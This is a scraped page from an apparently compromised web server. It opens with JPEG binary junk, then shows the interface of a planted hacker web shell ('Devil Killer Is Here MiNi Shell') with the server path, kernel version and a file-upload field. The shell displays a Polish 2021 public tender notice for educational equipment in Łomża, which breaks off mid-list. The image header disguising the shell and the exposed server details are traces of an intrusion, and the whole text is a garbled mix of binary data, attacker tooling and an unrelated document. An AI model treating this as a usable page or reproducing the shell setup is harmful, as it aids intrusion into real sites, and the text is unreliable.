JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210331/0002603801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00026038 z dnia 2021-03-31</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa sprzętu dydaktycznego na potrzeby projektu „Efektywne kształcenie zawodowe w ASP w Łomży” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Rozwoju Regionalnego Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 450094751</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Marii Skłodowskiej Curie 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">862163326</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">862163326</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">arr.lomza@podlaskie.org.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.podlaskie.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> 70.22.Z </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa sprzętu dydaktycznego na potrzeby projektu „Efektywne kształcenie zawodowe w ASP w Łomży” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df4a9b53-91ec-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00026038</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> "Efektywne kształcenie zawodowe w ASP w Łomży" współfinansowany przez Unię Europejską w ramach Regionalnego Programu Operacyjnego Województwa Podlaskiego </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.podlaskie.org.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: <span class="normal"></h3> <p class="mb-0">użycie środków komunikacji elektronicznej wymaga pozyskania przez zamawiającego specjalistycznego sprzętu biurowego (art. 65 ust. 1 pkt 3 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">6.	Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie faksem na numer (86) 216 33 26 lub drogą lub drogą elektroniczną na adres: arr.lomza@podlaskie.org.pl, z wyjątkiem:1)	ofert, które należy złożyć pod rygorem nieważności w formie pisemnej. Zamawiający nie wyraża zgody na składnie ofert w postaci elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym przy pomocy ważnego kwalifikowanego certyfikatu;2)	dokumentów wymienionych w rozdziale VIII Specyfikacji, które należy przedłożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osoby uprawnione do reprezentacji Wykonawcy zgodnie z dokumentem rejestrowym lub pełnomocnictwem złożonym zgodnie z rozdziałem XII.1.3) Specyfikacji i opatrzone pieczątkami imiennymi;3)	pełnomocnictwa, które należy przedłożyć w oryginale lub notarialnie poświadczonej kopii;•	pisemnego zobowiązania podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia, które należy przedłożyć w oryginale;•	oświadczeń i dokumentów uzupełnianych na wezwanie Zamawiającego w trybie art. 26 ust. 3 Ustawy, które należy złożyć w formach, określonych w punkcie 6.2) i 3) niniejszego rozdziału Specyfikacji, odpowiednich dla tych dokumentów, dla których Prawodawca przewidział wyłącznie formę pisemną.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający – AGENCJA ROZWOJU REGIONALNEGO S.A. 18-400 Łomża, ul. M.C. Skłodowskiej 1 zapewnia, że powierzone przez Wykonawcę dane osobowe są przetwarzane zgodnie z przepisami rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. U.UE.L.2016.119.1) – dalej zwanego „RODO” oraz ustawy z dnia 10 maja 2018 r. o ochronie danych.Szczegółowe informacje dotyczące RODO zostały zawarte w załączniku nr 7 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 632806,16 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu dydaktycznego na potrzeby projektu „Efektywne kształcenie zawodowe w ASP w Łomży” współfinansowanego przez Unię Europejską w ramach Regionalnego Programu Operacyjnego, Oś priorytetowa III „Kompetencje i kwalifikacje”, Działanie: 3.3 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki”, Poddziałanie 3.3.1 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki” realizowanego przez AGENCJĘ ROZWOJU REGIONALANEGO S.A. W ŁOMŻY, zgodnie ze szczegółowym opisem przedmiotu zamówienia zamieszczonym w załączniki nr 8 do SWZ.Część I - Oprogramowanie i komponenty1)	Wirtualna strzelnica – 2 sztuki Sala do symulacji – interaktywny trenażer strzelecki z osprzętem audio/oprogramowaniem (2 zestawy – strzelectwo specjalne) 2)Oprogramowanie z wieczystą licencją – 1 sztuka </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 129999,99 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">31682210-5 - Aparatura i sprzęt sterujący</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu dydaktycznego na potrzeby projektu „Efektywne kształcenie zawodowe w ASP w Łomży” współfinansowanego przez Unię Europejską w ramach Regionalnego Programu Operacyjnego, Oś priorytetowa III „Kompetencje i kwalifikacje”, Działanie: 3.3 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki”, Poddziałanie 3.3.1 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki” realizowanego przez AGENCJĘ ROZWOJU REGIONALANEGO S.A. W ŁOMŻY, zgodnie ze szczegółowym opisem przedmiotu zamówienia zamieszczonym w załączniki nr 8 do SWZ.Część II - Urządzenia IT1.Dyska sieciowy – 1 sztuka 2.Serwer – 1 sztuka 3.Router – 3 sztuki 4.Monitor interaktywny – 2 sztuki 5.Stół multimedialny – 1 sztuka 6.Dysk – 16 sztuk 7.Miernik mocy optycznej – 10 sztuk8.Router A – 10 sztuk 9.Router B – 10 sztuk 10.Kabel – 10 sztuk 11.Wkładki S.C. SM, DDM, WDM – 50 kompletów12.Przełączniki – 5 sztuk </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 257201,90 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">30237280-5 - Akcesoria zasilające</p> <p class="mb-0">31682210-5 - Aparatura i sprzęt sterujący</p> <p class="mb-0">31700000-3 - Urządzenia elektroniczne, elektromechaniczne i elektrotechniczne</p> <p class="mb-0">38000000-5 - Sprzęt laboratoryjny, optyczny i precyzyjny (z wyjątkiem szklanego)</p> <p class="mb-0">38636100-3 - Lasery</p> <p class="mb-0">38900000-4 - Różne przyrządy do badań lub testowania</p> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <p class="mb-0">44511000-5 - Narzędzia ręczne</p> <p class="mb-0">44512000-2 - Różne narzędzia ręczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Sposób obliczenia punktów dla poszczególnych kryteriów:a)	w ramach kryteriu Cena (C) ocenina będzie cena Łączna brutto podana w formularzu oferty wybranej części zamówienia. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:C =	Cmin	x	60	C.of.bad. gdzie:C – ilość punktów oferty (liczona z dokładnością do dwóch miejsc po przecinku),C min.– najniższa łączna cena ryczałtowa oferty brutto za realizację zamówienia spośród ofert nieodrzuconych,C.of.bad. – cena oferty badanej,b)	w ramach kryterium Termin dostawy (TD) punkty będą obliczane w następujący sposób:liczba punktów będzie obliczana wg następującego wzoru: najkrótszy termin dostawy spośród wszystkich złożonych ofert TD = ……………………………………………………………..... x 40 pkt Termin dostawy wskazany w ofercie badanej (liczba dni)Maksymalny termin dostawy został określony w rozdziale III Specyfikacji. W przypadku braku wskazania terminu dostawy w treści Formularza ofertowego Zamawiający uzna, iż Wykonawca zaoferował maksymalny termin dostawy tj. 30 dni. Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie ze wzorem:R = C + TDR – Łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów,C – łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”,TD – łączna liczba punktów przyznanych Wykonawcy w kryterium „Termin dostawy”.Oferta może uzyskać maksymalnie 100 punktów (100%) przy czym 1 pkt = 1% w kryteriach oceny ofert. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa sprzętu dydaktycznego na potrzeby projektu „Efektywne kształcenie zawodowe w ASP w Łomży” współfinansowanego przez Unię Europejską w ramach Regionalnego Programu Operacyjnego, Oś priorytetowa III „Kompetencje i kwalifikacje”, Działanie: 3.3 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki”, Poddziałanie 3.3.1 „Kształcenie zawodowe młodzieży na rzecz konkurencyjności podlaskiej gospodarki” realizowanego przez AGENCJĘ ROZWOJU REGIONALANEGO S.A. W ŁOMŻY, zgodnie ze szczegółowym opisem przedmiotu zamówienia zamieszczonym w załączniki nr 8 do SWZ.Część III - Urządzenia elektrotechniczne1.Miernik – 2 sztuki2.Spawarka światłowodowa z akcesoriami dla spawacza – 2 sztuki3.Reflektometr OTDR – 1 sztuka 4.Miernik rezystancji uziemienia – 10 sztuk 5.Miernik impedancji pętli zwarcia – 10 sztuk 6.Miernik multimetr elektroniczny uniwesralny – 10 sztuk 7.Wizualny lokalizator uszkodzeń – 10 sztuk 8.Stacja lutownicza – 5 sztuk </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 245603,27 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">30237280-5 - Akcesoria 